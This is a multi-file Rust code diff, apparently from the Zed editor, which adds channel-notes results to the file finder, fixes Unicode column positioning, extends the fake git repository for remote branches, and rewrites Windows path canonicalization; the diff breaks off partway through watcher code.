rel_path::RelPath,
};
use workspace::{
- ModalView, OpenOptions, OpenVisible, SplitDirection, Workspace, item::PreviewTabsSettings,
- notifications::NotifyResultExt, pane,
+ ModalView, OpenChannelNotesById, OpenOptions, OpenVisible, SplitDirection, Workspace,
+ item::PreviewTabsSettings, notifications::NotifyResultExt, pane,
};
use zed_actions::search::ToggleIncludeIgnored;
@@ -321,7 +322,7 @@ impl FileFinder {
if let Some(workspace) = delegate.workspace.upgrade()
&& let Some(m) = delegate.matches.get(delegate.selected_index())
{
- let path = match &m {
+ let path = match m {
Match::History { path, .. } => {
let worktree_id = path.project.worktree_id;
ProjectPath {
@@ -334,6 +335,7 @@ impl FileFinder {
path: m.0.path.clone(),
},
Match::CreateNew(p) => p.clone(),
+ Match::Channel { .. } => return,
};
let open_task = workspace.update(cx, move |workspace, cx| {
workspace.split_path_preview(path, false, Some(split_direction), window, cx)
@@ -392,6 +394,7 @@ pub struct FileFinderDelegate {
file_finder: WeakEntity<FileFinder>,
workspace: WeakEntity<Workspace>,
project: Entity<Project>,
+ channel_store: Option<Entity<ChannelStore>>,
search_count: usize,
latest_search_id: usize,
latest_search_did_cancel: bool,
@@ -450,13 +453,18 @@ struct Matches {
matches: Vec<Match>,
}
-#[derive(Debug, PartialEq, Eq, PartialOrd, Ord, Clone)]
+#[derive(Debug, Clone)]
enum Match {
History {
path: FoundPath,
panel_match: Option<ProjectPanelOrdMatch>,
},
Search(ProjectPanelOrdMatch),
+ Channel {
+ channel_id: ChannelId,
+ channel_name: SharedString,
+ string_match: StringMatch,
+ },
CreateNew(ProjectPath),
}
@@ -465,7 +473,7 @@ impl Match {
match self {
Match::History { path, .. } => Some(&path.project.path),
Match::Search(panel_match) => Some(&panel_match.0.path),
- Match::CreateNew(_) => None,
+ Match::Channel { .. } | Match::CreateNew(_) => None,
}
}
@@ -479,7 +487,7 @@ impl Match {
.read(cx)
.absolutize(&path_match.path),
),
- Match::CreateNew(_) => None,
+ Match::Channel { .. } | Match::CreateNew(_) => None,
}
}
@@ -487,7 +495,7 @@ impl Match {
match self {
Match::History { panel_match, .. } => panel_match.as_ref(),
Match::Search(panel_match) => Some(panel_match),
- Match::CreateNew(_) => None,
+ Match::Channel { .. } | Match::CreateNew(_) => None,
}
}
}
@@ -554,18 +562,21 @@ impl Matches {
.extend(history_items.into_iter().map(path_to_entry));
return;
};
- // If several worktress are open we have to set the worktree root names in path prefix
- let several_worktrees = worktree_store.read(cx).worktrees().count() > 1;
- let worktree_name_by_id = several_worktrees.then(|| {
- worktree_store
- .read(cx)
- .worktrees()
- .map(|worktree| {
- let snapshot = worktree.read(cx).snapshot();
- (snapshot.id(), snapshot.root_name().into())
- })
- .collect()
- });
+
+ let worktree_name_by_id = if should_hide_root_in_entry_path(&worktree_store, cx) {
+ None
+ } else {
+ Some(
+ worktree_store
+ .read(cx)
+ .worktrees()
+ .map(|worktree| {
+ let snapshot = worktree.read(cx).snapshot();
+ (snapshot.id(), snapshot.root_name().into())
+ })
+ .collect(),
+ )
+ };
let new_history_matches = matching_history_items(
history_items,
currently_opened,
@@ -628,7 +639,6 @@ impl Matches {
(_, Match::CreateNew(_)) => return cmp::Ordering::Greater,
_ => {}
}
- debug_assert!(a.panel_match().is_some() && b.panel_match().is_some());
match (&a, &b) {
// bubble currently opened files to the top
@@ -651,32 +661,35 @@ impl Matches {
}
}
- let a_panel_match = match a.panel_match() {
- Some(pm) => pm,
- None => {
- return if b.panel_match().is_some() {
- cmp::Ordering::Less
- } else {
- cmp::Ordering::Equal
- };
+ // For file-vs-file matches, use the existing detailed comparison.
+ if let (Some(a_panel), Some(b_panel)) = (a.panel_match(), b.panel_match()) {
+ let a_in_filename = Self::is_filename_match(a_panel);
+ let b_in_filename = Self::is_filename_match(b_panel);
+
+ match (a_in_filename, b_in_filename) {
+ (true, false) => return cmp::Ordering::Greater,
+ (false, true) => return cmp::Ordering::Less,
+ _ => {}
}
- };
- let b_panel_match = match b.panel_match() {
- Some(pm) => pm,
- None => return cmp::Ordering::Greater,
- };
+ return a_panel.cmp(b_panel);
+ }
- let a_in_filename = Self::is_filename_match(a_panel_match);
- let b_in_filename = Self::is_filename_match(b_panel_match);
+ let a_score = Self::match_score(a);
+ let b_score = Self::match_score(b);
+ // When at least one side is a channel, compare by raw score.
+ a_score
+ .partial_cmp(&b_score)
+ .unwrap_or(cmp::Ordering::Equal)
+ }
- match (a_in_filename, b_in_filename) {
- (true, false) => return cmp::Ordering::Greater,
- (false, true) => return cmp::Ordering::Less,
- _ => {} // Both are filename matches or both are path matches
+ fn match_score(m: &Match) -> f64 {
+ match m {
+ Match::History { panel_match, .. } => panel_match.as_ref().map_or(0.0, |pm| pm.0.score),
+ Match::Search(pm) => pm.0.score,
+ Match::Channel { string_match, .. } => string_match.score,
+ Match::CreateNew(_) => 0.0,
}
-
- a_panel_match.cmp(b_panel_match)
}
/// Determines if the match occurred within the filename rather than in the path
@@ -786,6 +799,16 @@ fn matching_history_items<'a>(
matching_history_paths
}
+fn should_hide_root_in_entry_path(worktree_store: &Entity<WorktreeStore>, cx: &App) -> bool {
+ let multiple_worktrees = worktree_store
+ .read(cx)
+ .visible_worktrees(cx)
+ .filter(|worktree| !worktree.read(cx).is_single_file())
+ .nth(1)
+ .is_some();
+ ProjectPanelSettings::get_global(cx).hide_root && !multiple_worktrees
+}
+
#[derive(Debug, Clone, PartialEq, Eq, PartialOrd, Ord, Hash)]
struct FoundPath {
project: ProjectPath,
@@ -833,10 +856,16 @@ impl FileFinderDelegate {
cx: &mut Context<FileFinder>,
) -> Self {
Self::subscribe_to_updates(&project, window, cx);
+ let channel_store = if FileFinderSettings::get_global(cx).include_channels {
+ ChannelStore::try_global(cx)
+ } else {
+ None
+ };
Self {
file_finder,
workspace,
project,
+ channel_store,
search_count: 0,
latest_search_id: 0,
latest_search_did_cancel: false,
@@ -885,14 +914,12 @@ impl FileFinderDelegate {
.currently_opened_path
.as_ref()
.map(|found_path| Arc::clone(&found_path.project.path));
- let worktrees = self
- .project
- .read(cx)
- .worktree_store()
+ let worktree_store = self.project.read(cx).worktree_store();
+ let worktrees = worktree_store
.read(cx)
.visible_worktrees_and_single_files(cx)
.collect::<Vec<_>>();
- let include_root_name = worktrees.len() > 1;
+ let include_root_name = !should_hide_root_in_entry_path(&worktree_store, cx);
let candidate_sets = worktrees
.into_iter()
.map(|worktree| {
@@ -971,6 +998,68 @@ impl FileFinderDelegate {
path_style,
);
+ // Add channel matches
+ if let Some(channel_store) = &self.channel_store {
+ let channel_store = channel_store.read(cx);
+ let channels: Vec<_> = channel_store.channels().cloned().collect();
+ if !channels.is_empty() {
+ let candidates = channels
+ .iter()
+ .enumerate()
+ .map(|(id, channel)| StringMatchCandidate::new(id, &channel.name));
+ let channel_query = query.path_query();
+ let query_lower = channel_query.to_lowercase();
+ let mut channel_matches = Vec::new();
+ for candidate in candidates {
+ let channel_name = candidate.string;
+ let name_lower = channel_name.to_lowercase();
+
+ let mut positions = Vec::new();
+ let mut query_idx = 0;
+ for (name_idx, name_char) in name_lower.char_indices() {
+ if query_idx < query_lower.len() {
+ let query_char =
+ query_lower[query_idx..].chars().next().unwrap_or_default();
+ if name_char == query_char {
+ positions.push(name_idx);
+ query_idx += query_char.len_utf8();
+ }
+ }
+ }
+
+ if query_idx == query_lower.len() {
+ let channel = &channels[candidate.id];
+ let score = if name_lower == query_lower {
+ 1.0
+ } else if name_lower.starts_with(&query_lower) {
+ 0.8
+ } else {
+ 0.5 * (query_lower.len() as f64 / name_lower.len() as f64)
+ };
+ channel_matches.push(Match::Channel {
+ channel_id: channel.id,
+ channel_name: channel.name.clone(),
+ string_match: StringMatch {
+ candidate_id: candidate.id,
+ score,
+ positions,
+ string: channel_name,
+ },
+ });
+ }
+ }
+ for channel_match in channel_matches {
+ match self
+ .matches
+ .position(&channel_match, self.currently_opened_path.as_ref())
+ {
+ Ok(_duplicate) => {}
+ Err(ix) => self.matches.matches.insert(ix, channel_match),
+ }
+ }
+ }
+ }
+
let query_path = query.raw_query.as_str();
if let Ok(mut query_path) = RelPath::new(Path::new(query_path), path_style) {
let available_worktree = self
@@ -1056,17 +1145,8 @@ impl FileFinderDelegate {
if let Some(panel_match) = panel_match {
self.labels_for_path_match(&panel_match.0, path_style)
} else if let Some(worktree) = worktree {
- let multiple_folders_open = self
- .project
- .read(cx)
- .visible_worktrees(cx)
- .filter(|worktree| !worktree.read(cx).is_single_file())
- .nth(1)
- .is_some();
-
- let full_path = if ProjectPanelSettings::get_global(cx).hide_root
- && !multiple_folders_open
- {
+ let worktree_store = self.project.read(cx).worktree_store();
+ let full_path = if should_hide_root_in_entry_path(&worktree_store, cx) {
entry_path.project.path.clone()
} else {
worktree.read(cx).root_name().join(&entry_path.project.path)
@@ -1095,6 +1175,16 @@ impl FileFinderDelegate {
}
}
Match::Search(path_match) => self.labels_for_path_match(&path_match.0, path_style),
+ Match::Channel {
+ channel_name,
+ string_match,
+ ..
+ } => (
+ channel_name.to_string(),
+ string_match.positions.clone(),
+ "Channel Notes".to_string(),
+ vec![],
+ ),
Match::CreateNew(project_path) => (
format!("Create file: {}", project_path.path.display(path_style)),
vec![],
@@ -1479,6 +1569,16 @@ impl PickerDelegate for FileFinderDelegate {
if let Some(m) = self.matches.get(self.selected_index())
&& let Some(workspace) = self.workspace.upgrade()
{
+ // Channel matches are handled separately since they dispatch an action
+ // rather than directly opening a file path.
+ if let Match::Channel { channel_id, .. } = m {
+ let channel_id = channel_id.0;
+ let finder = self.file_finder.clone();
+ window.dispatch_action(OpenChannelNotesById { channel_id }.boxed_clone(), cx);
+ finder.update(cx, |_, cx| cx.emit(DismissEvent)).log_err();
+ return;
+ }
+
let open_task = workspace.update(cx, |workspace, cx| {
let split_or_open =
|workspace: &mut Workspace,
@@ -1571,6 +1671,7 @@ impl PickerDelegate for FileFinderDelegate {
window,
cx,
),
+ Match::Channel { .. } => unreachable!("handled above"),
}
});
@@ -1598,7 +1699,12 @@ impl PickerDelegate for FileFinderDelegate {
active_editor
.downgrade()
.update_in(cx, |editor, window, cx| {
- editor.go_to_singleton_buffer_point(Point::new(row, col), window, cx);
+ let Some(buffer) = editor.buffer().read(cx).as_singleton() else {
+ return;
+ };
+ let buffer_snapshot = buffer.read(cx).snapshot();
+ let point = buffer_snapshot.point_from_external_input(row, col);
+ editor.go_to_singleton_buffer_point(point, window, cx);
})
.log_err();
}
@@ -1627,7 +1733,7 @@ impl PickerDelegate for FileFinderDelegate {
let path_match = self.matches.get(ix)?;
- let history_icon = match &path_match {
+ let end_icon = match path_match {
Match::History { .. } => Icon::new(IconName::HistoryRerun)
.color(Color::Muted)
.size(IconSize::Small)
@@ -1636,6 +1742,10 @@ impl PickerDelegate for FileFinderDelegate {
.flex_none()
.size(IconSize::Small.rems())
.into_any_element(),
+ Match::Channel { .. } => v_flex()
+ .flex_none()
+ .size(IconSize::Small.rems())
+ .into_any_element(),
Match::CreateNew(_) => Icon::new(IconName::Plus)
.color(Color::Muted)
.size(IconSize::Small)
@@ -1643,21 +1753,24 @@ impl PickerDelegate for FileFinderDelegate {
};
let (file_name_label, full_path_label) = self.labels_for_match(path_match, window, cx);
- let file_icon = maybe!({
- if !settings.file_icons {
- return None;
- }
- let abs_path = path_match.abs_path(&self.project, cx)?;
- let file_name = abs_path.file_name()?;
- let icon = FileIcons::get_icon(file_name.as_ref(), cx)?;
- Some(Icon::from_path(icon).color(Color::Muted))
- });
+ let file_icon = match path_match {
+ Match::Channel { .. } => Some(Icon::new(IconName::Hash).color(Color::Muted)),
+ _ => maybe!({
+ if !settings.file_icons {
+ return None;
+ }
+ let abs_path = path_match.abs_path(&self.project, cx)?;
+ let file_name = abs_path.file_name()?;
+ let icon = FileIcons::get_icon(file_name.as_ref(), cx)?;
+ Some(Icon::from_path(icon).color(Color::Muted))
+ }),
+ };
Some(
ListItem::new(ix)
.spacing(ListItemSpacing::Sparse)
.start_slot::<Icon>(file_icon)
- .end_slot::<AnyElement>(history_icon)
+ .end_slot::<AnyElement>(end_icon)
.inset(true)
.toggle_state(selected)
.child(
@@ -400,6 +400,18 @@ async fn test_absolute_paths(cx: &mut TestAppContext) {
#[gpui::test]
async fn test_complex_path(cx: &mut TestAppContext) {
let app_state = init_test(cx);
+
+ cx.update(|cx| {
+ let settings = *ProjectPanelSettings::get_global(cx);
+ ProjectPanelSettings::override_global(
+ ProjectPanelSettings {
+ hide_root: true,
+ ..settings
+ },
+ cx,
+ );
+ });
+
app_state
.fs
.as_fake()
@@ -509,6 +521,91 @@ async fn test_row_column_numbers_query_inside_file(cx: &mut TestAppContext) {
});
}
+#[gpui::test]
+async fn test_row_column_numbers_query_inside_unicode_file(cx: &mut TestAppContext) {
+ let app_state = init_test(cx);
+
+ let first_file_name = "first.rs";
+ let first_file_contents = "aéøbcdef";
+ app_state
+ .fs
+ .as_fake()
+ .insert_tree(
+ path!("/src"),
+ json!({
+ "test": {
+ first_file_name: first_file_contents,
+ "second.rs": "// Second Rust file",
+ }
+ }),
+ )
+ .await;
+
+ let project = Project::test(app_state.fs.clone(), [path!("/src").as_ref()], cx).await;
+
+ let (picker, workspace, cx) = build_find_picker(project, cx);
+
+ let file_query = &first_file_name[..3];
+ let file_row = 1;
+ let file_column = 5;
+ let query_inside_file = format!("{file_query}:{file_row}:{file_column}");
+ picker
+ .update_in(cx, |finder, window, cx| {
+ finder
+ .delegate
+ .update_matches(query_inside_file.to_string(), window, cx)
+ })
+ .await;
+ picker.update(cx, |finder, _| {
+ assert_match_at_position(finder, 1, &query_inside_file.to_string());
+ let finder = &finder.delegate;
+ assert_eq!(finder.matches.len(), 2);
+ let latest_search_query = finder
+ .latest_search_query
+ .as_ref()
+ .expect("Finder should have a query after the update_matches call");
+ assert_eq!(latest_search_query.raw_query, query_inside_file);
+ assert_eq!(latest_search_query.file_query_end, Some(file_query.len()));
+ assert_eq!(latest_search_query.path_position.row, Some(file_row));
+ assert_eq!(latest_search_query.path_position.column, Some(file_column));
+ });
+
+ cx.dispatch_action(Confirm);
+
+ let editor = cx.update(|_, cx| workspace.read(cx).active_item_as::<Editor>(cx).unwrap());
+ cx.executor().advance_clock(Duration::from_secs(2));
+
+ let expected_column = first_file_contents
+ .chars()
+ .take(file_column as usize - 1)
+ .map(|character| character.len_utf8())
+ .sum::<usize>();
+
+ editor.update(cx, |editor, cx| {
+ let all_selections = editor.selections.all_adjusted(&editor.display_snapshot(cx));
+ assert_eq!(
+ all_selections.len(),
+ 1,
+ "Expected to have 1 selection (caret) after file finder confirm, but got: {all_selections:?}"
+ );
+ let caret_selection = all_selections.into_iter().next().unwrap();
+ assert_eq!(
+ caret_selection.start, caret_selection.end,
+ "Caret selection should have its start and end at the same position"
+ );
+ assert_eq!(
+ file_row,
+ caret_selection.start.row + 1,
+ "Query inside file should get caret with the same focus row"
+ );
+ assert_eq!(
+ expected_column,
+ caret_selection.start.column as usize,
+ "Query inside file should map user-visible columns to byte offsets for Unicode text"
+ );
+ });
+}
+
#[gpui::test]
async fn test_row_column_numbers_query_outside_file(cx: &mut TestAppContext) {
let app_state = init_test(cx);
@@ -1413,6 +1510,18 @@ async fn test_create_file_no_focused_with_multiple_worktrees(cx: &mut TestAppCon
#[gpui::test]
async fn test_path_distance_ordering(cx: &mut TestAppContext) {
let app_state = init_test(cx);
+
+ cx.update(|cx| {
+ let settings = *ProjectPanelSettings::get_global(cx);
+ ProjectPanelSettings::override_global(
+ ProjectPanelSettings {
+ hide_root: true,
+ ..settings
+ },
+ cx,
+ );
+ });
+
app_state
.fs
.as_fake()
@@ -1648,6 +1757,17 @@ async fn test_query_history(cx: &mut gpui::TestAppContext) {
async fn test_history_match_positions(cx: &mut gpui::TestAppContext) {
let app_state = init_test(cx);
+ cx.update(|cx| {
+ let settings = *ProjectPanelSettings::get_global(cx);
+ ProjectPanelSettings::override_global(
+ ProjectPanelSettings {
+ hide_root: true,
+ ..settings
+ },
+ cx,
+ );
+ });
+
app_state
.fs
.as_fake()
@@ -2148,6 +2268,17 @@ async fn test_toggle_panel_new_selections(cx: &mut gpui::TestAppContext) {
async fn test_search_preserves_history_items(cx: &mut gpui::TestAppContext) {
let app_state = init_test(cx);
+ cx.update(|cx| {
+ let settings = *ProjectPanelSettings::get_global(cx);
+ ProjectPanelSettings::override_global(
+ ProjectPanelSettings {
+ hide_root: true,
+ ..settings
+ },
+ cx,
+ );
+ });
+
app_state
.fs
.as_fake()
@@ -2253,6 +2384,17 @@ async fn test_search_preserves_history_items(cx: &mut gpui::TestAppContext) {
async fn test_search_sorts_history_items(cx: &mut gpui::TestAppContext) {
let app_state = init_test(cx);
+ cx.update(|cx| {
+ let settings = *ProjectPanelSettings::get_global(cx);
+ ProjectPanelSettings::override_global(
+ ProjectPanelSettings {
+ hide_root: true,
+ ..settings
+ },
+ cx,
+ );
+ });
+
app_state
.fs
.as_fake()
@@ -2736,6 +2878,17 @@ async fn test_selected_history_item_stays_selected_on_worktree_updated(cx: &mut
async fn test_history_items_vs_very_good_external_match(cx: &mut gpui::TestAppContext) {
let app_state = init_test(cx);
+ cx.update(|cx| {
+ let settings = *ProjectPanelSettings::get_global(cx);
+ ProjectPanelSettings::override_global(
+ ProjectPanelSettings {
+ hide_root: true,
+ ..settings
+ },
+ cx,
+ );
+ });
+
app_state
.fs
.as_fake()
@@ -2784,6 +2937,17 @@ async fn test_history_items_vs_very_good_external_match(cx: &mut gpui::TestAppCo
async fn test_nonexistent_history_items_not_shown(cx: &mut gpui::TestAppContext) {
let app_state = init_test(cx);
+ cx.update(|cx| {
+ let settings = *ProjectPanelSettings::get_global(cx);
+ ProjectPanelSettings::override_global(
+ ProjectPanelSettings {
+ hide_root: true,
+ ..settings
+ },
+ cx,
+ );
+ });
+
app_state
.fs
.as_fake()
@@ -3183,6 +3347,17 @@ async fn test_history_items_uniqueness_for_multiple_worktree_open_all_files(
async fn test_selected_match_stays_selected_after_matches_refreshed(cx: &mut gpui::TestAppContext) {
let app_state = init_test(cx);
+ cx.update(|cx| {
+ let settings = *ProjectPanelSettings::get_global(cx);
+ ProjectPanelSettings::override_global(
+ ProjectPanelSettings {
+ hide_root: true,
+ ..settings
+ },
+ cx,
+ );
+ });
+
app_state.fs.as_fake().insert_tree("/src", json!({})).await;
app_state
@@ -3709,7 +3884,7 @@ impl SearchEntries {
fn collect_search_matches(picker: &Picker<FileFinderDelegate>) -> SearchEntries {
let mut search_entries = SearchEntries::default();
for m in &picker.delegate.matches.matches {
- match &m {
+ match m {
Match::History {
path: history_path,
panel_match: path_match,
@@ -3734,6 +3909,7 @@ fn collect_search_matches(picker: &Picker<FileFinderDelegate>) -> SearchEntries
search_entries.search_matches.push(path_match.0.clone());
}
Match::CreateNew(_) => {}
+ Match::Channel { .. } => {}
}
}
search_entries
@@ -3768,6 +3944,7 @@ fn assert_match_at_position(
Match::History { path, .. } => path.absolute.file_name().and_then(|s| s.to_str()),
Match::Search(path_match) => path_match.0.path.file_name(),
Match::CreateNew(project_path) => project_path.path.file_name(),
+ Match::Channel { channel_name, .. } => Some(channel_name.as_str()),
}
.unwrap();
assert_eq!(match_file_name, expected_file_name);
@@ -3777,6 +3954,17 @@ fn assert_match_at_position(
async fn test_filename_precedence(cx: &mut TestAppContext) {
let app_state = init_test(cx);
+ cx.update(|cx| {
+ let settings = *ProjectPanelSettings::get_global(cx);
+ ProjectPanelSettings::override_global(
+ ProjectPanelSettings {
+ hide_root: true,
+ ..settings
+ },
+ cx,
+ );
+ });
+
app_state
.fs
.as_fake()
@@ -3821,6 +4009,18 @@ async fn test_filename_precedence(cx: &mut TestAppContext) {
#[gpui::test]
async fn test_paths_with_starting_slash(cx: &mut TestAppContext) {
let app_state = init_test(cx);
+
+ cx.update(|cx| {
+ let settings = *ProjectPanelSettings::get_global(cx);
+ ProjectPanelSettings::override_global(
+ ProjectPanelSettings {
+ hide_root: true,
+ ..settings
+ },
+ cx,
+ );
+ });
+
app_state
.fs
.as_fake()
@@ -48,6 +48,7 @@ cocoa = "0.26"
[target.'cfg(target_os = "windows")'.dependencies]
windows.workspace = true
+dunce.workspace = true
[target.'cfg(any(target_os = "linux", target_os = "freebsd"))'.dependencies]
ashpd.workspace = true
@@ -392,6 +392,8 @@ impl GitRepository for FakeGitRepository {
.map(|branch_name| {
let ref_name = if branch_name.starts_with("refs/") {
branch_name.into()
+ } else if branch_name.contains('/') {
+ format!("refs/remotes/{branch_name}").into()
} else {
format!("refs/heads/{branch_name}").into()
};
@@ -425,7 +427,7 @@ impl GitRepository for FakeGitRepository {
.unwrap_or_else(|| "refs/heads/main".to_string());
let main_worktree = Worktree {
path: work_dir,
- ref_name: branch_ref.into(),
+ ref_name: Some(branch_ref.into()),
sha: head_sha.into(),
};
let mut all = vec![main_worktree];
@@ -436,15 +438,14 @@ impl GitRepository for FakeGitRepository {
fn create_worktree(
&self,
- name: String,
- directory: PathBuf,
+ branch_name: String,
+ path: PathBuf,
from_commit: Option<String>,
) -> BoxFuture<'_, Result<()>> {
let fs = self.fs.clone();
let executor = self.executor.clone();
let dot_git_path = self.dot_git_path.clone();
async move {
- let path = directory.join(&name);
executor.simulate_random_delay().await;
// Check for simulated error before any side effects
fs.with_git_state(&dot_git_path, false, |state| {
@@ -459,18 +460,18 @@ impl GitRepository for FakeGitRepository {
fs.with_git_state(&dot_git_path, true, {
let path = path.clone();
move |state| {
- if state.branches.contains(&name) {
- bail!("a branch named '{}' already exists", name);
+ if state.branches.contains(&branch_name) {
+ bail!("a branch named '{}' already exists", branch_name);
}
- let ref_name = format!("refs/heads/{name}");
+ let ref_name = format!("refs/heads/{branch_name}");
let sha = from_commit.unwrap_or_else(|| "fake-sha".to_string());
state.refs.insert(ref_name.clone(), sha.clone());
state.worktrees.push(Worktree {
path,
- ref_name: ref_name.into(),
+ ref_name: Some(ref_name.into()),
sha: sha.into(),
});
- state.branches.insert(name);
+ state.branches.insert(branch_name);
Ok::<(), anyhow::Error>(())
}
})??;
@@ -569,6 +570,11 @@ impl GitRepository for FakeGitRepository {
_base_branch: Option<String>,
) -> BoxFuture<'_, Result<()>> {
self.with_state_async(true, move |state| {
+ if let Some((remote, _)) = name.split_once('/')
+ && !state.remotes.contains_key(remote)
+ {
+ state.remotes.insert(remote.to_owned(), "".to_owned());
+ }
state.branches.insert(name);
Ok(())
})
@@ -587,7 +593,7 @@ impl GitRepository for FakeGitRepository {
})
}
- fn delete_branch(&self, name: String) -> BoxFuture<'_, Result<()>> {
+ fn delete_branch(&self, _is_remote: bool, name: String) -> BoxFuture<'_, Result<()>> {
self.with_state_async(true, move |state| {
if !state.branches.remove(&name) {
bail!("no such branch: {name}");
@@ -790,7 +796,7 @@ impl GitRepository for FakeGitRepository {
}
fn diff(&self, _diff: git::repository::DiffType) -> BoxFuture<'_, Result<String>> {
- unimplemented!()
+ future::ready(Ok(String::new())).boxed()
}
fn diff_stat(
@@ -981,6 +987,11 @@ impl GitRepository for FakeGitRepository {
fn remove_remote(&self, name: String) -> BoxFuture<'_, Result<()>> {
self.with_state_async(true, move |state| {
+ state.branches.retain(|branch| {
+ branch
+ .split_once('/')
+ .is_none_or(|(remote, _)| remote != name)
+ });
state.remotes.remove(&name);
Ok(())
})
@@ -37,7 +37,7 @@ use is_executable::IsExecutable;
use rope::Rope;
use serde::{Deserialize, Serialize};
use smol::io::AsyncWriteExt;
-#[cfg(any(target_os = "windows", feature = "test-support"))]
+#[cfg(feature = "test-support")]
use std::path::Component;
use std::{
io::{self, Write},
@@ -60,6 +60,8 @@ use git::{
repository::{InitialGraphCommitData, RepoPath, repo_path},
status::{FileStatus, StatusCode, TrackedStatus, UnmergedStatus},
};
+#[cfg(feature = "test-support")]
+use util::normalize_path;
#[cfg(feature = "test-support")]
use smol::io::AsyncReadExt;
@@ -76,6 +78,7 @@ pub enum PathEventKind {
Removed,
Created,
Changed,
+ Rescan,
}
#[derive(Clone, PartialEq, Eq, PartialOrd, Ord, Debug)]
@@ -147,7 +150,7 @@ pub trait Fs: Send + Sync {
&self,
abs_dot_git: &Path,
system_git_binary_path: Option<&Path>,
- ) -> Option<Arc<dyn GitRepository>>;
+ ) -> Result<Arc<dyn GitRepository>>;
async fn git_init(&self, abs_work_directory: &Path, fallback_branch_name: String)
-> Result<()>;
async fn git_clone(&self, repo_url: &str, abs_work_directory: &Path) -> Result<()>;
@@ -431,82 +434,43 @@ impl RealFs {
#[cfg(target_os = "windows")]
fn canonicalize(path: &Path) -> Result<PathBuf> {
- let mut strip_prefix = None;
+ use std::ffi::OsString;
+ use std::os::windows::ffi::OsStringExt;
+ use windows::Win32::Storage::FileSystem::GetVolumePathNameW;
+ use windows::core::HSTRING;
- let mut new_path = PathBuf::new();
- for component in path.components() {
- match component {
- std::path::Component::Prefix(_) => {
- let component = component.as_os_str();
- let canonicalized = if component
- .to_str()
- .map(|e| e.ends_with("\\"))
- .unwrap_or(false)
- {
- std::fs::canonicalize(component)
- } else {
- let mut component = component.to_os_string();
- component.push("\\");
- std::fs::canonicalize(component)
- }?;
-
- let mut strip = PathBuf::new();
- for component in canonicalized.components() {
- match component {
- Component::Prefix(prefix_component) => {
- match prefix_component.kind() {
- std::path::Prefix::Verbatim(os_str) => {
- strip.push(os_str);
- }
- std::path::Prefix::VerbatimUNC(host, share) => {
- strip.push("\\\\");
- strip.push(host);
- strip.push(share);
- }
- std::path::Prefix::VerbatimDisk(disk) => {
- strip.push(format!("{}:", disk as char));
- }
- _ => strip.push(component),
- };
- }
- _ => strip.push(component),
- }
- }
- strip_prefix = Some(strip);
- new_path.push(component);
- }
- std::path::Component::RootDir => {
- new_path.push(component);
- }
- std::path::Component::CurDir => {
- if strip_prefix.is_none() {
- // unrooted path
- new_path.push(component);
- }
- }
- std::path::Component::ParentDir => {
- if strip_prefix.is_some() {
- // rooted path
- new_path.pop();
- } else {
- new_path.push(component);
- }
- }
- std::path::Component::Normal(_) => {
- if let Ok(link) = std::fs::read_link(new_path.join(component)) {
- let link = match &strip_prefix {
- Some(e) => link.strip_prefix(e).unwrap_or(&link),
- None => &link,
- };
- new_path.extend(link);
- } else {
- new_path.push(component);
- }
- }
- }
- }
+ // std::fs::canonicalize resolves mapped network paths to UNC paths, which can
+ // confuse some software. To mitigate this, we canonicalize the input, then rebase
+ // the result onto the input's original volume root if both paths are on the same
+ // volume. This keeps the same drive letter or mount point the caller used.
- Ok(new_path)
+ let abs_path = if path.is_relative() {
+ std::env::current_dir()?.join(path)
+ } else {
+ path.to_path_buf()
+ };
+
+ let path_hstring = HSTRING::from(abs_path.as_os_str());
+ let mut vol_buf = vec![0u16; abs_path.as_os_str().len() + 2];
+ unsafe { GetVolumePathNameW(&path_hstring, &mut vol_buf)? };
+ let volume_root = {
+ let len = vol_buf
+ .iter()
+ .position(|&c| c == 0)
+ .unwrap_or(vol_buf.len());
+ PathBuf::from(OsString::from_wide(&vol_buf[..len]))
+ };
+
+ let resolved_path = dunce::canonicalize(&abs_path)?;
+ let resolved_root = dunce::canonicalize(&volume_root)?;
+
+ if let Ok(relative) = resolved_path.strip_prefix(&resolved_root) {
+ let mut result = volume_root;
+ result.push(relative);
+ Ok(result)
+ } else {
+ Ok(resolved_path)
+ }
}
}
@@ -682,9 +646,12 @@ impl Fs for RealFs {
code == libc::ENOSYS
|| code == libc::ENOTSUP
|| code == libc::EOPNOTSUPP
+ || code == libc::EINVAL
}) =>
{
// For case when filesystem or kernel does not support atomic no-overwrite rename.
+ // EINVAL is returned by FUSE-based filesystems (e.g. NTFS via ntfs-3g)
+ // that don't support RENAME_NOREPLACE.
true
}
Err(error) => return Err(error.into()),
@@ -1149,8 +1116,8 @@ impl Fs for RealFs {
&self,
dotgit_path: &Path,
system_git_binary_path: Option<&Path>,
- ) -> Option<Arc<dyn GitRepository>> {
- Some(Arc::new(RealGitRepository::new(
+ ) -> Result<Arc<dyn GitRepository>> {
+ Ok(Arc::new(RealGitRepository::new(
dotgit_path,
self.bundled_git_binary_path.clone(),
system_git_binary_path.map(|path| path.to_path_buf()),
@@ -1776,6 +1743,10 @@ impl FakeFs {
self.state.lock().buffered_events.len()
}
+ pub fn clear_buffered_events(&self) {
+ self.state.lock().buffered_events.clear();
+ }
+
pub fn flush_events(&self, count: usize) {
self.state.lock().flush_events(count);
}
@@ -2866,9 +2837,7 @@ impl Fs for FakeFs {
&self,
abs_dot_git: &Path,
_system_git_binary: Option<&Path>,
- ) -> Option<Arc<dyn GitRepository>> {
- use util::ResultExt as _;
-
+ ) -> Result<Arc<dyn GitRepository>> {
self.with_git_state_and_paths(
abs_dot_git,
false,
@@ -2884,7 +2853,6 @@ impl Fs for FakeFs {
}) as _
},
)
- .log_err()
}
async fn git_init(
@@ -2919,10 +2887,6 @@ impl Fs for FakeFs {
}
}
-pub fn normalize_path(path: &Path) -> PathBuf {
- util::normalize_path(path)
-}
-
pub async fn copy_recursive<'a>(
fs: &'a dyn Fs,
source: &'a Path,
@@ -3,6 +3,7 @@ use parking_lot::Mutex;
use std::{
collections::{BTreeMap, HashMap},
ops::DerefMut,
+ path::Path,
sync::{Arc, OnceLock},
};
use util::{ResultExt, paths::SanitizedPath};
@@ -86,10 +87,12 @@ impl Watcher for FsWatcher {
#[cfg(target_os = "linux")]
let mode = notify::RecursiveMode::NonRecursive;
+ let registration_path = path.clone();
let registration_id = global({
- let path = path.clone();
+ let watch_path = path.clone();
+ let callback_path = path;
|g| {
- g.add(path, mode, move |event: ¬ify::Event| {
+ g.add(watch_path, mode, move |event: ¬ify::Event| {
log::trace!("watcher received event: {event:?}");
let kind = match event.kind {
EventKind::Create(_) => Some(PathEventKind::Created),
@@ -109,12 +112,27 @@ impl Watcher for FsWatcher {
})
.collect::<Vec<_>>();
